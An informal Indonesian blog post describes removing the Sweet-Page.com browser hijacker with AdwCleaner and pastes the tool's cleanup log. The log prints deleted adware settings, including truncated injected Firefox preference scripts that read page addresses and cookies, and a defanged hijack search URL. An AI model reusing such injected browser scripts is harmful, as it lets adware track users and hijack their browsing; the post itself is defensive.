Cara Menghapus Browser Hijacker

Gaess, gue muncul lagi nih. Nah kali ini gue mau ngasih tips ampuh. Tips ini beberapa waktu yang lalu sudah menyelamakan kelangsungan browser gue. Jadi, kemaren HOMEPAGE browser gue (Mozilla Firefox) berubah menjadi Sweet-Page.com. Normalnya, kalu lu buka Mozilla kan langsung ada ‘google search engine’ kan. Nah kemaren beda, gue buka Mozilla eh adanya malah Sweet-Page.com.

Gue curiga Sweet-Page itu apa sih. Berhubung gue orangnya curigaan langsung deh gue googling. Hasilnya, ternyata itu sejenis "virus" berupa "browser hijacker". Akibat paling berbahaya dari virus ini bisa mencuri data-data berharga kamu. Seperti email dan paswordnya, data M-Banking mu, dan aksi-aksi tidak terpuji lainnya. Maklumlah Sweet-page.com kecilnya nggak pernah ngaji sih.. *lah

Secara lebih rinci gue gambarkan aksi ‘tidak terpuji’ mereka diantaranya :

1.   Mengubah homepage default / mengubah homepage setingan yang telah kita atur, pada saat awal menjalankan internet browser.
Misalnya: homepage default anda adalah Google, maka akan berubah Sweet-page.com, seperti pada image di atas.

2.   Mengubah default search engine setiap kali membuka browser, membuka tab baru, yaitu search engine hijacker seperti tampak pada gambar di atas.

3.   Memata-matai kebiasaan kita berinternet berdasarkan cookie dan history web-web yang kita kunjungi, sehingga anda akan dijejali berbagai iklan yang sangat mengganggu.

Dan kenapa di lepi gue bisa ada sweet-page.com ?

Pertanyaan yang bagus ! Jadi kemarin gue sempet download software gratisan dari salah satu web abal-abal. 

Lu mungkin pernah mengalami kejadian sekampret ini kan. Nah waspada saja gaes. FYI, browser hijacker selain sweet-page.com ada kok. Diantaranya, Start.Qone8.com,MySearch, ShopNav ,  AboutBlank ,  CoolWebSearch , CoolWebSearch.image, Onlinestability.com ,  Security Toolbar, HeretoFind, dan lain-lain yang banyak lagi.

Kembali ke sweet-page.com....

Menurut Malware Tips, laman yang berbagi soal cara menghapus Sweet-Page dan malware lainnya:

"Sweet-Page.com is a browser hijacker, which is promoted via other free downloads, and once installed it will change your browser homepage to sweet-page.com."

Intinya, "virus" malware Sweet-Page.com itu harus dihapus, dibasmi, dibunuh! Caranya:

Download AdwCleaner di link ini: ADWCLEANER DOWNLOAD LINK (This link will automatically download AdwCleaner on your computer).

Sebelum install program AdwCleaner, tutup semua program dan browser internet yang sedang dibuka.

    Doble klik ikon AdwCleaner hasil download tadi (proses intall).

    Setelah install selesai, program AdwCleaner akan terbuka.

    Klik tombol Scan

    Selesai scanning, klik tomblol Clean. Bunuh semuanya!

Ini dia hasil kerja AdwCleaner di komputer gue sekaligus menghapus malware Sweet-Page.com.

# AdwCleaner v3.023 - Report created 04/04/2014 at 23:35:16

# Updated 01/04/2014 by Xplode

# Operating System : Windows 7 Ultimate  (32 bits)

# Username : 1 - 1-PC

# Running from : D:\DOWNLOADS\adwcleaner.exe

# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\boost_interprocess

Folder Deleted : C:\ProgramData\SNT

Folder Deleted : C:\ProgramData\WPM

Folder Deleted : C:\Program Files\Mega Browse

Folder Deleted : C:\Program Files\SNT

Folder Deleted : C:\Users\1\AppData\Local\Mobogenie

Folder Deleted : C:\Users\1\AppData\Local\torch

Folder Deleted : C:\Users\1\AppData\Local\Temp\Mega Browse

Folder Deleted : C:\Users\1\Documents\Mobogenie

Folder Deleted : C:\Users\FAMILY\AppData\Local\Conduit

Folder Deleted : C:\Users\FAMILY\AppData\Local\NativeMessaging

Folder Deleted : C:\Users\FAMILY\AppData\Local\torch

Folder Deleted : C:\Users\FAMILY\AppData\Local\Temp\NativeMessaging

Folder Deleted : C:\Users\FAMILY\AppData\LocalLow\Conduit

Folder Deleted : C:\Users\FAMILY\AppData\Roaming\baidu

File Deleted : C:\END

File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\searchplugins\WebSearch.xml

File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\user.js

File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\user.js

File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage

File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage-journal

File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage

File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage-journal

***** [ Shortcuts ] *****

Shortcut Disinfected : C:\Users\Public\Desktop\Google Chrome.lnk

Shortcut Disinfected : C:\Users\1\Desktop\Firefox NEW.lnk

Shortcut Disinfected : C:\Users\1\Desktop\Firefox OLD.lnk

Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk

Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk

Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk

Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\LiveSupport_RASAPI32

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\livesupport_rasmancs

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs

Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd

Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASAPI32

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASMANCS

Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}

Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}

Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}

Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}

Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}

Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}

Data Restored : HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command

Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}

Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}

Key Deleted : HKLM\Software\{5F189DF5-2D05-472B-9091-84D9848AE48B}

Key Deleted : HKLM\Software\supWPM

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.7600.16385

Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]

-\\ Mozilla Firefox v28.0 (en-US)

[ File : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\prefs.js ]

Line Deleted : user_pref("browser.search.defaultenginename,S", "WebSearch");

Line Deleted : user_pref("browser.search.defaulturl", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");

Line Deleted : user_pref("browser.search.order.1", "WebSearch");

Line Deleted : user_pref("browser.search.order.1,S", "WebSearch");

Line Deleted : user_pref("browser.search.selectedEngine,S", "WebSearch");

Line Deleted : user_pref("extensions.0sd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorob[...]

Line Deleted : user_pref("extensions.2Mua0n5fa.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]

Line Deleted : user_pref("extensions.IwfG.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumoro[...]

Line Deleted : user_pref("extensions.L1CjSWwAf.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]

Line Deleted : user_pref("keyword.URL", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");

[ File : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\prefs.js ]

Line Deleted : user_pref("browser.startup.homepage", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51");

[ File : C:\Users\FAMILY\AppData\Roaming\Mozilla\Firefox\Profiles\cttpyw9p.default\prefs.js ]

-\\ Google Chrome v33.0.1750.154

[ File : C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\preferences ]

[ File : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [39744 octets] - [28/02/2014 21:45:46]

AdwCleaner[R1].txt - [9773 octets] - [04/04/2014 23:33:36]

AdwCleaner[S0].txt - [36508 octets] - [28/02/2014 21:48:20]

AdwCleaner[S1].txt - [7978 octets] - [04/04/2014 23:35:16]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [8038 octets] ##########

Finally, AdwCleaner berjasa besar menghapus virus itu dari lepi gue. Thank you AdwCleaner, special thanks buat kawan-kawan blogger yang sudah berbagi tips kece ini. Pesen gue terakhir, jangan sembarangan download dan install software, terutama dari link atau situs gratisan! Hati-hati......! Kejahatan ada disekitar anda, bahkan dari tempat yang tidak pernah lu duga sebelumnya...!

See U Next Post...!